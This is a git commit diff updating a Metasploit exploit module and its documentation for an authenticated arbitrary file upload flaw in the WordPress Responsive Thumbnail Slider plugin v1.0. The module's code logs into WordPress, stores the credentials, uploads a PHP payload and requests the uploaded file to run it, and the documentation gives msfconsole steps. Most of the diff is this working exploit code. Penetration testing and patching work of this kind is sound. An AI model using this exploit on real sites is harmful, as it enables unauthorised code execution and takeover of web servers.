Update module and its documentation
This commit is contained in:
parent
be1bf8b1fc
commit
72d634b10b
|
@ -1,13 +1,16 @@
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
||||||
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
|
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin
|
||||||
|
v1.0 for WordPress post authentication.
|
||||||
|
|
||||||
|
For testing purposes, you may download a vulnerable version [here](https://www.exploit-db.com/apps/f5d34e16d07e61ad6826d2c1f3d16089-wp-responsive-thumbnail-slider.zip).
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
1. Install the application
|
1. Install the application
|
||||||
2. Start msfconsole
|
2. Start msfconsole
|
||||||
3. Do: ```use [exploit/multi/http/wp_responsive_thumbnail_slider_upload]```
|
3. Do: ```use exploit/multi/http/wp_responsive_thumbnail_slider_upload```
|
||||||
4. Do: ```set RHOSTS [IP]```
|
4. Do: ```set RHOSTS [IP]```
|
||||||
5. Do: ```set TARGETURI [URI]```
|
5. Do: ```set TARGETURI [URI]```
|
||||||
6. Do: ```set USERNAME [USERNAME]```
|
6. Do: ```set USERNAME [USERNAME]```
|
||||||
|
|
|
@ -4,21 +4,24 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HTTP::Wordpress
|
||||||
include Msf::Exploit::PhpEXE
|
include Msf::Exploit::PhpEXE
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
|
'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
|
This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
|
||||||
|
Plugin v1.0 for WordPress post authentication.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [ 'Arash Khazaei', # EDB PoC
|
'Author' =>
|
||||||
'Shelby Pace' # Metasploit Module
|
[
|
||||||
],
|
'Arash Khazaei', # EDB PoC
|
||||||
|
'Shelby Pace' # Metasploit Module
|
||||||
|
],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'EDB', '37998' ]
|
[ 'EDB', '37998' ]
|
||||||
|
@ -29,10 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
[
|
[
|
||||||
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
|
[ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'BadChars' => "\x00"
|
|
||||||
},
|
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => "Aug 28 2015",
|
'DisclosureDate' => "Aug 28 2015",
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
@ -40,12 +39,42 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
|
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
|
||||||
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
|
OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
|
||||||
OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
|
OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
# The version regex found in extract_and_check_version does not work for this plugin's
|
||||||
|
# readme.txt, so we build a custom one.
|
||||||
|
check_code = check_version || check_plugin_path
|
||||||
|
if check_code
|
||||||
|
return check_code
|
||||||
|
else
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_version
|
||||||
|
plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
|
||||||
|
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => plugin_uri
|
||||||
|
)
|
||||||
|
|
||||||
|
if res && res.body && res.body =~ /Version:([\d\.]+)/
|
||||||
|
version = Gem::Version.new($1)
|
||||||
|
if version <= Gem::Version.new('1.0')
|
||||||
|
vprint_status("Plugin version found: #{version}")
|
||||||
|
return CheckCode::Appears
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_plugin_path
|
||||||
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
|
plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
|
@ -53,51 +82,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'uri' => plugin_uri
|
'uri' => plugin_uri
|
||||||
)
|
)
|
||||||
|
|
||||||
unless res && res.code == 200
|
if res && res.code == 200
|
||||||
return Exploit::CheckCode::Safe
|
vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
|
||||||
|
return CheckCode::Detected
|
||||||
end
|
end
|
||||||
|
|
||||||
Exploit::CheckCode::Detected
|
nil
|
||||||
end
|
end
|
||||||
|
|
||||||
def login
|
def login
|
||||||
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
|
auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
|
||||||
res = send_request_cgi(
|
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
|
||||||
'method' => 'GET',
|
|
||||||
'uri' => wp_uri
|
|
||||||
)
|
|
||||||
|
|
||||||
if res && res.body.include?("WordPress") && res.code == 200
|
store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
|
||||||
print_status("WordPress accessed")
|
|
||||||
else
|
|
||||||
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
|
|
||||||
end
|
|
||||||
|
|
||||||
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
|
print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
|
||||||
cookies = res.get_cookies
|
auth_cookies
|
||||||
wp_login_res = send_request_cgi(
|
|
||||||
'method' => 'POST',
|
|
||||||
'uri' => wp_uri,
|
|
||||||
'cookie' => cookies,
|
|
||||||
'vars_post' => {
|
|
||||||
'log' => datastore['USERNAME'],
|
|
||||||
'pwd' => datastore['PASSWORD'],
|
|
||||||
'wp-submit' => 'Log In',
|
|
||||||
'redirect_to' => redirect_uri
|
|
||||||
}
|
|
||||||
)
|
|
||||||
|
|
||||||
auth_cookies = wp_login_res.get_cookies
|
|
||||||
auth_res = send_request_cgi(
|
|
||||||
'method' => 'GET',
|
|
||||||
'uri' => redirect_uri,
|
|
||||||
'cookie' => auth_cookies
|
|
||||||
)
|
|
||||||
|
|
||||||
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
|
|
||||||
|
|
||||||
print_good("Logged into WordPress")
|
|
||||||
upload_payload(auth_cookies)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def upload_payload(cookies)
|
def upload_payload(cookies)
|
||||||
|
@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
|
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
|
||||||
|
|
||||||
print_good("Successful upload")
|
print_good("Successful upload")
|
||||||
execute = send_request_raw(
|
send_request_cgi(
|
||||||
'uri' => file_uri,
|
'uri' => file_uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'cookie' => cookies
|
'cookie' => cookies
|
||||||
|
@ -151,8 +151,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
unless check == Exploit::CheckCode::Safe
|
unless check == CheckCode::Safe
|
||||||
login
|
auth_cookies = login
|
||||||
|
upload_payload(auth_cookies)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue